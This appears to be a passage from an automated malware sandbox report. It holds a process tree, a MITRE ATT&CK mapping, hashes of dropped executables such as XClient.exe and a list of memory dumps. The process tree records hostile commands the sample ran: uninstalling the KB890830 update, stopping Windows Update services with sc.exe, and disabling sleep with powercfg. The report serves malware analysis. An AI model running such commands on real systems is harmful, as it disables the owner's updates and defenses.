  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3264
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2404
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2988
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1752
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2740
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3272
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4408
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4020
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2312

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log

Filesize
611B

MD5
0ac178e97bb01bbc54e3e8e56557bb94

SHA1
c867e788182ed35a331b643d557c1fb0056db87e

SHA256
2bc4f3fb1aef5822fcf28fab63a766249870cddc64af10138bf1e33fe4315878

SHA512
07ef4a4cf9f553485c2c1e405e42d15f70040c1e552b75cddb8030a1a96bf929828097538664565aa1a04a48627753058e8fe00ba2f44bda26210f2573ebbeeb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
512KB

MD5
8d3a25390dd42b60df91ed3c7ec34272

SHA1
cb1d9fd51592a347bf0c7b2e7540713208c3cdc9

SHA256
68c945d0ecc6ae6f1321e100ff50e1ae98ea679b8e7a836b3c0a944274f65e68

SHA512
1d191bdefb2a47ec62dd08e1f193d7929b62877e708e535aacac801b99a84fbbe12d9332d013843c81b519e005e1ba582f08543105e2c04dd814beeda1526109

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c4567d22b1194a2331cf14484a10b010

SHA1
a31a99df2888bc7054984bcf5de85f3d53cef3c9

SHA256
c9636d89d44f14dab97870fe5f24c2852339e17c0107222534fef03cac4d21ce

SHA512
70cf0a9bc4eec6e5eb4e7bcbca057c204df65137645665f2a4d77ba6854e26850ac3af709a04ebd019e14e4c49b86ce6c2046f8729851f38bbaf9637244400d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
803192e7bd3f169ea850433fe1f5ba43

SHA1
9cc8b152de847341ff0fdc0d6ab3069d515af9dc

SHA256
6b14268974f9b04e80d4946b03fa6d5b67e000eed2a2e830d326cc6d8aa8f6e2

SHA512
5447248448f6c2d8c6040ccdb37a2b8d39fd40a8fb921d3e19fc5d6f5a338dd5b5f9cf24c19138d88df7be0347d78e477ca4480dcab7afa1fc9b6b2390744f59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d3eaecb5267856bf6b31c048f1145838

SHA1
3709312ff414ff111207800954c4d439c58cd5b7

SHA256
b64eb30faf3e31325bc2678de40d258ea1e751c975da98d26c46ad853ee9d91b

SHA512
1c23c1cf440c7a9d75788f50b90a80ae68ce7f612330aa689f9bee43abedc778f1c0b695f27d4f1964f53eda82c485c759c8a6b717b82257228711ad36de2f1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ff80f2bdae8c9463b0953a6a90ebba78

SHA1
43c15cde4736ffe110bb40ad197aa07d47919f98

SHA256
83f890ed5f5dd25f3556bf9a1817ea7f732788ba4f4d515b24a87312c7ca4f5a

SHA512
5e6731dc144bc2fa5110300dd3b35acffdc0a1637298f7c7b6090119a0e5da99a21efe3647a689f414e85b3b89f3c4d57405e5b716bad4d03d08a8bc3d719134

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vju1ufo5.lc4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpADEA.tmp.bat

Filesize
138B

MD5
b7edf388325f26587ddcaaba6a298141

SHA1
a444366870942c6df4b559262688b553597b7ae3

SHA256
734cb165f0abcb4fa6a1342e5198bfc58a8cbc7f59a32edf6730a469b354779e

SHA512
d005e369ef8b09c012425ca3cadab95a5bb4c4ef21ead3725e0c76d9891c1b22034f13bc67e20ceef420782e0c643c27bb7c03f0717350e72daa3be2adbb63bb

Download Submit
C:\Users\Public\XboxInstaller.exe

Filesize
13.4MB

MD5
33c9518c086d0cca4a636bc86728485e

SHA1
2420ad25e243ab8905b49f60fe7fb96590661f50

SHA256
ba30ea16cd8fbd9209d40ae193206ad00f042d100524cf310982c33369325ca2

SHA512
6c2c470607b88e7cd79411b7a645b395cee3306a23e6ba50b8ac57f7d5529a1b350c34e19da69aeb1ffade44d5187b4a1ef209a53d21a83e9e35add10fc7867d

Download Submit
C:\Users\Public\build.exe

Filesize
5.1MB

MD5
e99a422a6e87545ae15e8184ea697809

SHA1
18c04b90aa66b23e87460ff9c91d732d5147872b

SHA256
4095beaf2970d2f15ff23e49a4c7bb8969c0a9e0bd5b034f6a442066c8e1ab92

SHA512
7f56e7b56a01f65f5f8e17c1dd9743c76136dee004b9e94cf544343e43fab4b5233f8405ec3909b5f01612e7399696dd5b66fad9ba361319fccf6457816a39dd

Download Submit
C:\Users\Public\flux.exe

Filesize
554KB

MD5
153e795f536e7159e5a14ed836e31dc0

SHA1
6d1049b0f029e8c96fb612b048b71ee6f32c9398

SHA256
b3d902eb6101db0346fd033453d626b7c8e92be6264fd06609b486006d4f0310

SHA512
74567f0d8c02ab638c083e15806bfcfd38f219bb6c46c596f165ffbd1b05ef685d7ab3eff17c198dd4d42d4866f076e644aef282e10ec875db48dc35f6251a70

Download Submit
memory/532-140-0x0000000005D40000-0x0000000006094000-memory.dmp

Filesize
3.3MB

Download
memory/532-142-0x00000000691B0000-0x00000000691FC000-memory.dmp

Filesize
304KB

Download
memory/904-91-0x0000000004CB0000-0x00000000052D8000-memory.dmp

Filesize
6.2MB

Download
memory/904-105-0x0000000005B30000-0x0000000005B7C000-memory.dmp

Filesize
304KB

Download
memory/904-127-0x0000000007170000-0x0000000007178000-memory.dmp

Filesize
32KB

Download
memory/904-126-0x0000000007190000-0x00000000071AA000-memory.dmp

Filesize
104KB

Download
memory/904-125-0x0000000007090000-0x00000000070A4000-memory.dmp

Filesize
80KB

Download
memory/904-124-0x0000000007080000-0x000000000708E000-memory.dmp

Filesize
56KB

Download
memory/904-123-0x0000000007050000-0x0000000007061000-memory.dmp

Filesize
68KB

Download
memory/904-122-0x00000000070D0000-0x0000000007166000-memory.dmp

Filesize
600KB

Download
memory/904-90-0x0000000000D80000-0x0000000000DB6000-memory.dmp

Filesize
216KB

Download
memory/904-121-0x0000000006EC0000-0x0000000006ECA000-memory.dmp

Filesize
40KB

Download
memory/904-92-0x0000000004C60000-0x0000000004C82000-memory.dmp

Filesize
136KB

Download
memory/904-93-0x0000000005350000-0x00000000053B6000-memory.dmp

Filesize
408KB

Download
memory/904-120-0x0000000006E50000-0x0000000006E6A000-memory.dmp

Filesize
104KB

Download
memory/904-103-0x0000000005560000-0x00000000058B4000-memory.dmp

Filesize
3.3MB

Download
memory/904-104-0x0000000005B10000-0x0000000005B2E000-memory.dmp

Filesize
120KB

Download
memory/904-119-0x0000000007490000-0x0000000007B0A000-memory.dmp

Filesize
6.5MB

Download
memory/904-106-0x0000000006CC0000-0x0000000006CF2000-memory.dmp

Filesize
200KB

Download
memory/904-107-0x00000000691B0000-0x00000000691FC000-memory.dmp

Filesize
304KB

Download
memory/904-117-0x0000000006D00000-0x0000000006D1E000-memory.dmp

Filesize
120KB

Download
memory/904-118-0x0000000006D20000-0x0000000006DC3000-memory.dmp

Filesize
652KB

Download
memory/1560-48-0x0000000006B90000-0x0000000006B9A000-memory.dmp

Filesize
40KB

Download
memory/1560-46-0x0000000006BB0000-0x0000000006BD6000-memory.dmp

Filesize
152KB

Download
memory/1560-78-0x000000000CE50000-0x000000000CE58000-memory.dmp

Filesize
32KB

Download
memory/1560-77-0x0000000016F10000-0x0000000016F32000-memory.dmp

Filesize
136KB

Download
memory/1560-273-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/1560-47-0x0000000006B80000-0x0000000006B88000-memory.dmp

Filesize
32KB

Download
memory/1560-60-0x000000000C320000-0x000000000C358000-memory.dmp

Filesize
224KB

Download
memory/1560-61-0x0000000009D80000-0x0000000009D8E000-memory.dmp

Filesize
56KB

Download
memory/1560-45-0x0000000000F70000-0x0000000001CDA000-memory.dmp

Filesize
13.4MB

Download
memory/1560-44-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/2296-175-0x0000000005930000-0x0000000005C84000-memory.dmp

Filesize
3.3MB

Download
memory/2296-186-0x00000000691B0000-0x00000000691FC000-memory.dmp

Filesize
304KB

Download
memory/2312-257-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-259-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-282-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-281-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-280-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-276-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-275-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-258-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-261-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-266-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-265-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-268-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-267-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-264-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-262-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-260-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2312-263-0x00000000015B0000-0x00000000015D0000-memory.dmp

Filesize
128KB

Download
memory/2312-256-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2624-162-0x00000000058D0000-0x0000000005C24000-memory.dmp

Filesize
3.3MB

Download
memory/2624-164-0x00000000691B0000-0x00000000691FC000-memory.dmp

Filesize
304KB

Download
memory/3092-40-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/3092-27-0x00000000006C0000-0x0000000000750000-memory.dmp

Filesize
576KB

Download
memory/3092-289-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/3092-38-0x00000000055A0000-0x000000000563C000-memory.dmp

Filesize
624KB

Download
memory/3092-37-0x0000000005360000-0x0000000005378000-memory.dmp

Filesize
96KB

Download
memory/3092-26-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/3092-28-0x0000000005160000-0x00000000051F2000-memory.dmp

Filesize
584KB

Download
memory/3092-227-0x0000000006DD0000-0x0000000006DDA000-memory.dmp

Filesize
40KB

Download
memory/3092-76-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/3092-226-0x0000000006DE0000-0x0000000007384000-memory.dmp

Filesize
5.6MB

Download
memory/3092-269-0x00000000749AE000-0x00000000749AF000-memory.dmp

Filesize
4KB

Download
memory/3092-270-0x00000000749A0000-0x0000000075150000-memory.dmp

Filesize
7.7MB

Download
memory/4020-255-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4020-250-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4020-249-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4020-252-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4020-248-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4020-251-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4216-1-0x0000000000950000-0x0000000001C60000-memory.dmp

Filesize
19.1MB

Download
memory/4216-0-0x00007FF8440F3000-0x00007FF8440F5000-memory.dmp

Filesize
8KB

Download
memory/4688-244-0x000001FC65CB0000-0x000001FC65CB6000-memory.dmp

Filesize
24KB

Download
memory/4688-238-0x000001FC65AA0000-0x000001FC65B55000-memory.dmp

Filesize
724KB

Download
memory/4688-241-0x000001FC65A70000-0x000001FC65A7A000-memory.dmp

Filesize
40KB

Download
memory/4688-242-0x000001FC65CE0000-0x000001FC65CFA000-memory.dmp

Filesize
104KB

Download
memory/4688-243-0x000001FC65CA0000-0x000001FC65CA8000-memory.dmp

Filesize
32KB

Download
memory/4688-245-0x000001FC65D00000-0x000001FC65D0A000-memory.dmp

Filesize
40KB

Download
memory/4688-239-0x000001FC65A60000-0x000001FC65A6A000-memory.dmp

Filesize
40KB

Download
memory/4688-240-0x000001FC65CC0000-0x000001FC65CDC000-memory.dmp

Filesize
112KB

Download
memory/4688-237-0x000001FC65A80000-0x000001FC65A9C000-memory.dmp

Filesize
112KB

Download
memory/4980-206-0x000001A3346B0000-0x000001A3346D2000-memory.dmp

Filesize
136KB

Download